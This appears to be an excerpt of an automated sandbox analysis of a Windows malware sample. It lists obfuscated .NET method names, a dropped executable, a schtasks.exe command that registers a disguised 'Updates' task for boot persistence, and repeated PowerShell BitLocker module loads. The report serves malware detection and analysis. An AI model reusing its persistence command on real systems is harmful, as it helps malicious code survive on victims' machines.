                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, wWTpapXk05j7Eh2DMv.csHigh entropy of concatenated method names: 'EClGVUNjbM', 'Er9GJGcbaN', 'EXQnUTqPpu', 'XZNnRQW3kp', 'mxFGgbRwrv', 'zMCGLjR5TX', 'AKdG2ZM9Xc', 'EXRGllIPx7', 'gFxGPkXsbp', 'J7WGAB4s4P'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, GwBoCeRaNsqCa0eAhje.csHigh entropy of concatenated method names: 's18EJ8mFiu', 'KtXEzvOnth', 'VRB9UQkxAQ', 'SrwAdLjPab0w3vEsRVc', 'wZbOdYjz6nSo9h3upK5', 'OUYx2uAdtyfRMasCoEL', 'EmoymyAiAPYEfU8eqZH', 'eRL8VVAtYVLOZ5w4AlV'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, KSmB67RRfjE53Pem2VD.csHigh entropy of concatenated method names: 'oTjSJk8xfM', 'klTSz7GDt5', 'IPPEU5nRk7', 'Jk4ERV0xBt', 'xoVEF49ZmF', 'hNUEawIdLY', 'kIyEvfQTN6', 'KQHEu4VtbM', 'n8VE4AjVnd', 'r8DETVmPEf'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, TskOeV6g8oIAtWls5Z.csHigh entropy of concatenated method names: 'r3FtWgHHjJ', 'EfGtyaJXvt', 'djstwU00x0', 'Klrt6aQEGr', 'Hs3tcMwU9p', 'QJBtmNrHU0', 'e9MtGobksR', 'bnZtn7b9s5', 'au1tDej6Op', 'CBItSN5fg5'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, jlQchZ2k0fQ3fAmBYM.csHigh entropy of concatenated method names: 'Ws2HwoqQNC', 'IpTH6nIiuv', 'y1GH75MMf6', 'O3oHYhI53Y', 'YGQHk52J6q', 'geyHpMEmWJ', 'DAKHBsFRaE', 'iiWHe3VsMT', 'AQKHdwUg8j', 'u4fHgpJ11u'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, eOhFMaRvKPBteuThA1T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OrU9Dq3FQv', 'uJc9SGpbWS', 'Rx49EISVC8', 'Cew990y9t4', 'pIC9McZ8aW', 'Lgp9qg2oXr', 'fd39x7VHmj'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, ktXWBOzBckPRrD7caF.csHigh entropy of concatenated method names: 'Un9Sy4VTUt', 'Lm7SwfhlRQ', 'u13S66R2KK', 'mNHS7EyTHG', 'MB7SYefrgm', 'DiwSkpndyg', 'zJXSp6YXNk', 'BNLSxUy1Gl', 'towSZg6b73', 'KFgS300Yig'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, PNEodnCWQKK8QIoXdk.csHigh entropy of concatenated method names: 'jQqOKTxTQE', 'xGsOiY90Pa', 'ltjtr4kpTu', 'jJ8tkerbmL', 'e0ctpxpwd7', 'gj1tbSnv7n', 'piWtBvbCmm', 'em8tesrJZV', 'Mguto0tsjr', 'APVtdfwrX1'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, a2JyCioxnO13TM2WGe.csHigh entropy of concatenated method names: 'tm8fZtVZnl', 'n6df3GTFCa', 'IEEfs2JZra', 'MWcfWNhmQO', 'UIFfKVS2Qu', 'WgOfysrvnY', 'UeifiPpgi2', 'uwffw3Olfc', 'GoBf6FOGir', 'v4RfCm0ayU'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, XR3owhNrauYNYpYcJA.csHigh entropy of concatenated method names: 'xGVGhVDP6q', 'mGcG14RNYC', 'ToString', 'H4IG4pnZ91', 'DLUGTjAxDv', 'ObKGtlpIEO', 's7tGOec4Io', 'Yt4G0sjEqd', 'VifGfiMuit', 'ymRGQgUKj4'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, bDJtAQTauqFQTO0ymb.csHigh entropy of concatenated method names: 'Dispose', 'NprRj7MvCI', 'dpJFYbdOVA', 'APtS2quiwh', 'HXdRJYJKdW', 'zifRzk5hEj', 'ProcessDialogKey', 'W9KFU88PfK', 'AVDFR4qvpI', 'sdYFF4mivk'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, B88PfKjKVD4qvpISdY.csHigh entropy of concatenated method names: 'lZFD7WmVlc', 'OS8DY2rQwF', 'BqGDrCEmwU', 'jbcDk6UdFZ', 'fZiDpwYnCd', 'B7EDb3uIGh', 'd6qDB8lHqT', 'gxrDe5w2pE', 'vWxDolNr7G', 'qXjDdbbO8d'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, ihg39gFVr0Rs0dSEw5.csHigh entropy of concatenated method names: 'wOZsZSB4h', 'pOhWPFKW9', 'F0qyKwe66', 'B8OiTqoTK', 'uRs6KLLPL', 'THrCHRQvf', 'jYjFNGpC9kQdN7ZWof', 'XiyqHvehQ39xl3IhqC', 'JOnnFvVOn', 'cWUSAEPyF'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.csHigh entropy of concatenated method names: 'YreauYVpRC', 'lfYa4T8Vjy', 'ioMaTM5pWc', 'VWVat9K5Fs', 't0xaO4Eq7e', 'XFUa03hwDw', 'nv2afc2G5E', 'OPWaQZyyxd', 'Eq7aIwLWUv', 'GUfahqiiwe'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, rmSTFhlvm0xFks1ovR.csHigh entropy of concatenated method names: 'GWpcd7ls07', 'zSfcLUwsrK', 'AZ7clJCjjS', 'sJTcPLbydP', 'M9kcY8ajtc', 'EXFcrVs4hB', 'blAckvIDbl', 'xTTcploVOf', 't7Gcbi43tj', 'gmgcB39idD'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, fmivk3JR6hJ4HRtKJs.csHigh entropy of concatenated method names: 'JgBStQNoUD', 'ORnSOCjVD3', 'WI1S0u08Ko', 'jQcSfbKm7i', 'bQESD76EAl', 'sPMSQTQr8a', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, tWrtpMvFbRymNUpBNk.csHigh entropy of concatenated method names: 'euHRf6eXSF', 'PUARQ5h51Q', 'Xg8RhoIAtW', 'Qs5R1ZLNEo', 'loXRcdkthr', 's6QRm6NDYy', 'jZerpyM4uoraGCdDd4', 'PNrQTHPu619FSVb3fg', 'YncRRs8Sla', 'FOkRay0xbG'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, uZ81MvAt4DaV2uYW8f.csHigh entropy of concatenated method names: 'ToString', 'dG3mgFVdQ3', 'MZ7mYwacGU', 'ccqmrlm4yX', 'sjQmkcSVhd', 'GyLmpa746B', 'n1Cmbe1afe', 'bTXmB19pUy', 'au5meAfiqU', 'PVtmoGIDxf'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, t5TGUNtKysAnZYRpb5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'E9jFjvhCdI', 'f2EFJUIBon', 'EEHFzmHcDU', 'gGcaUBGvm4', 'S5IaR443JD', 'KX5aFw7Mrr', 'aOsaaAovNb', 'UCUkWBiXn3ckdd7LIIv'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, f64iliBPNDre6mPqmX.csHigh entropy of concatenated method names: 'qANf46jscp', 'AjKfteJ7pq', 'fw5f0YVkY1', 'vP90JiT5cr', 'dQl0zXPaDo', 'vM4fUEZciy', 'Al7fR2E6hg', 'vwJfFvtpWf', 'ka6faeKYKo', 'DybfvZ2F3v'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, LEhlTBRUPAutV2WiidS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FDKSgmQplG', 'yooSLrfmNY', 'QAjS2qYxGG', 'FNJSl8333E', 'LRASPsBTx2', 'MP5SADijOh', 'UsHSNJ2cJu'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, n6eXSFw2UA5h51Qd8E.csHigh entropy of concatenated method names: 'glJTlKMkOw', 'MLyTPtb6ta', 'FUBTAHyylZ', 'cSaTNcKco5', 'E40T8lVqdY', 'yTSTXLaIhS', 'cuKT5XQ3Ji', 'ydfTVWiDX1', 'RTWTjcYUc9', 'Dn7TJ2iLef'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hhrS6Q76NDYyAHKd2A.csHigh entropy of concatenated method names: 'O750uftUrP', 'bvM0TAtquh', 'hMS0OhIEw7', 'iY60fM6FC6', 'PY00QGDPpW', 'GLKO8mabjo', 'fDiOXl5TrW', 'vWeO56uORL', 'tSKOV1udis', 'xCNOjoS6Kk'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, Bv1HpA5W3dpr7MvCIY.csHigh entropy of concatenated method names: 'bc1DcnVwjj', 'VOMDGmcN71', 'scCDDB0heR', 'Lv6DEYv2Jn', 'X1EDMO84SC', 'Ie4DxtREPR', 'Dispose', 'L0Hn4BST40', 'bIcnTFuuXm', 'K8AntwnQpc'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, wWTpapXk05j7Eh2DMv.csHigh entropy of concatenated method names: 'EClGVUNjbM', 'Er9GJGcbaN', 'EXQnUTqPpu', 'XZNnRQW3kp', 'mxFGgbRwrv', 'zMCGLjR5TX', 'AKdG2ZM9Xc', 'EXRGllIPx7', 'gFxGPkXsbp', 'J7WGAB4s4P'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, GwBoCeRaNsqCa0eAhje.csHigh entropy of concatenated method names: 's18EJ8mFiu', 'KtXEzvOnth', 'VRB9UQkxAQ', 'SrwAdLjPab0w3vEsRVc', 'wZbOdYjz6nSo9h3upK5', 'OUYx2uAdtyfRMasCoEL', 'EmoymyAiAPYEfU8eqZH', 'eRL8VVAtYVLOZ5w4AlV'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, KSmB67RRfjE53Pem2VD.csHigh entropy of concatenated method names: 'oTjSJk8xfM', 'klTSz7GDt5', 'IPPEU5nRk7', 'Jk4ERV0xBt', 'xoVEF49ZmF', 'hNUEawIdLY', 'kIyEvfQTN6', 'KQHEu4VtbM', 'n8VE4AjVnd', 'r8DETVmPEf'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, TskOeV6g8oIAtWls5Z.csHigh entropy of concatenated method names: 'r3FtWgHHjJ', 'EfGtyaJXvt', 'djstwU00x0', 'Klrt6aQEGr', 'Hs3tcMwU9p', 'QJBtmNrHU0', 'e9MtGobksR', 'bnZtn7b9s5', 'au1tDej6Op', 'CBItSN5fg5'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, jlQchZ2k0fQ3fAmBYM.csHigh entropy of concatenated method names: 'Ws2HwoqQNC', 'IpTH6nIiuv', 'y1GH75MMf6', 'O3oHYhI53Y', 'YGQHk52J6q', 'geyHpMEmWJ', 'DAKHBsFRaE', 'iiWHe3VsMT', 'AQKHdwUg8j', 'u4fHgpJ11u'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, eOhFMaRvKPBteuThA1T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OrU9Dq3FQv', 'uJc9SGpbWS', 'Rx49EISVC8', 'Cew990y9t4', 'pIC9McZ8aW', 'Lgp9qg2oXr', 'fd39x7VHmj'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, ktXWBOzBckPRrD7caF.csHigh entropy of concatenated method names: 'Un9Sy4VTUt', 'Lm7SwfhlRQ', 'u13S66R2KK', 'mNHS7EyTHG', 'MB7SYefrgm', 'DiwSkpndyg', 'zJXSp6YXNk', 'BNLSxUy1Gl', 'towSZg6b73', 'KFgS300Yig'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, PNEodnCWQKK8QIoXdk.csHigh entropy of concatenated method names: 'jQqOKTxTQE', 'xGsOiY90Pa', 'ltjtr4kpTu', 'jJ8tkerbmL', 'e0ctpxpwd7', 'gj1tbSnv7n', 'piWtBvbCmm', 'em8tesrJZV', 'Mguto0tsjr', 'APVtdfwrX1'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, a2JyCioxnO13TM2WGe.csHigh entropy of concatenated method names: 'tm8fZtVZnl', 'n6df3GTFCa', 'IEEfs2JZra', 'MWcfWNhmQO', 'UIFfKVS2Qu', 'WgOfysrvnY', 'UeifiPpgi2', 'uwffw3Olfc', 'GoBf6FOGir', 'v4RfCm0ayU'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, XR3owhNrauYNYpYcJA.csHigh entropy of concatenated method names: 'xGVGhVDP6q', 'mGcG14RNYC', 'ToString', 'H4IG4pnZ91', 'DLUGTjAxDv', 'ObKGtlpIEO', 's7tGOec4Io', 'Yt4G0sjEqd', 'VifGfiMuit', 'ymRGQgUKj4'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, bDJtAQTauqFQTO0ymb.csHigh entropy of concatenated method names: 'Dispose', 'NprRj7MvCI', 'dpJFYbdOVA', 'APtS2quiwh', 'HXdRJYJKdW', 'zifRzk5hEj', 'ProcessDialogKey', 'W9KFU88PfK', 'AVDFR4qvpI', 'sdYFF4mivk'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, B88PfKjKVD4qvpISdY.csHigh entropy of concatenated method names: 'lZFD7WmVlc', 'OS8DY2rQwF', 'BqGDrCEmwU', 'jbcDk6UdFZ', 'fZiDpwYnCd', 'B7EDb3uIGh', 'd6qDB8lHqT', 'gxrDe5w2pE', 'vWxDolNr7G', 'qXjDdbbO8d'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, ihg39gFVr0Rs0dSEw5.csHigh entropy of concatenated method names: 'wOZsZSB4h', 'pOhWPFKW9', 'F0qyKwe66', 'B8OiTqoTK', 'uRs6KLLPL', 'THrCHRQvf', 'jYjFNGpC9kQdN7ZWof', 'XiyqHvehQ39xl3IhqC', 'JOnnFvVOn', 'cWUSAEPyF'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.csHigh entropy of concatenated method names: 'YreauYVpRC', 'lfYa4T8Vjy', 'ioMaTM5pWc', 'VWVat9K5Fs', 't0xaO4Eq7e', 'XFUa03hwDw', 'nv2afc2G5E', 'OPWaQZyyxd', 'Eq7aIwLWUv', 'GUfahqiiwe'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, rmSTFhlvm0xFks1ovR.csHigh entropy of concatenated method names: 'GWpcd7ls07', 'zSfcLUwsrK', 'AZ7clJCjjS', 'sJTcPLbydP', 'M9kcY8ajtc', 'EXFcrVs4hB', 'blAckvIDbl', 'xTTcploVOf', 't7Gcbi43tj', 'gmgcB39idD'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, fmivk3JR6hJ4HRtKJs.csHigh entropy of concatenated method names: 'JgBStQNoUD', 'ORnSOCjVD3', 'WI1S0u08Ko', 'jQcSfbKm7i', 'bQESD76EAl', 'sPMSQTQr8a', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, tWrtpMvFbRymNUpBNk.csHigh entropy of concatenated method names: 'euHRf6eXSF', 'PUARQ5h51Q', 'Xg8RhoIAtW', 'Qs5R1ZLNEo', 'loXRcdkthr', 's6QRm6NDYy', 'jZerpyM4uoraGCdDd4', 'PNrQTHPu619FSVb3fg', 'YncRRs8Sla', 'FOkRay0xbG'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, uZ81MvAt4DaV2uYW8f.csHigh entropy of concatenated method names: 'ToString', 'dG3mgFVdQ3', 'MZ7mYwacGU', 'ccqmrlm4yX', 'sjQmkcSVhd', 'GyLmpa746B', 'n1Cmbe1afe', 'bTXmB19pUy', 'au5meAfiqU', 'PVtmoGIDxf'
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, t5TGUNtKysAnZYRpb5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'E9jFjvhCdI', 'f2EFJUIBon', 'EEHFzmHcDU', 'gGcaUBGvm4', 'S5IaR443JD', 'KX5aFw7Mrr', 'aOsaaAovNb', 'UCUkWBiXn3ckdd7LIIv'
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeFile created: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
